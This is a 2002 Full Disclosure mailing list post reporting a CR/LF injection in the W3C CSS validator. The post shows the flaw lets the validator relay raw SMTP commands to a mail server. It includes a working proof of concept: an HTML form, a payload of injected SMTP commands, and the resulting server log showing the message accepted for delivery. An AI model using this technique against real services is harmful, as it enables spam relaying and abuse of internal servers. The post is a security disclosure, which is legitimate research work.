Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

W3C CSS Validator -- Proxying Attack

From: mattmurphy () kc rr com (Matthew Murphy)
Date: Sat, 14 Sep 2002 15:59:51 -0500
Another vulnerability at the W3C, this time the CSS validator.  A Cr/Lf
injection can be performed by creating a custom form:

<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator";>
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms(0).submit()"></TEXTAREA>
</FORM>

And filling it in with something like:

[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me () here com
RCPT TO:you () somewhere com
DATA
This is a simple message demonstrating the W3 relaying hole
.
QUIT

[End Form]

This results in:

GET /
502 Unknown Command
HELO 127.0.0.1
250 Welcome  [138.96.249.65], pleased to meet you
MAIL FROM:me () here com
250 Sender "me () here com" OK...
RCPT TO:you () somewhere com
250 Recipient "you () somewhere com" OK...
DATA
354 Enter mail, end with "." on a line by itself
This is a simple message demonstrating the W3 relaying hole
.
250 Message accepted for delivery.
QUIT
221 Closing Session

If you relay this properly, the CSS validator will whine about the
connection being terminated by the peer (this is done immediately after the
SMTP command "QUIT" being sent.  There is a 502 error in the logs from "GET
/", but that is really un-avoidable.

"The reason the mainstream is thought
of as a stream is because it is
so shallow."
                     - Author Unknown
Previous By Date Next
Previous By Thread Next

Current thread: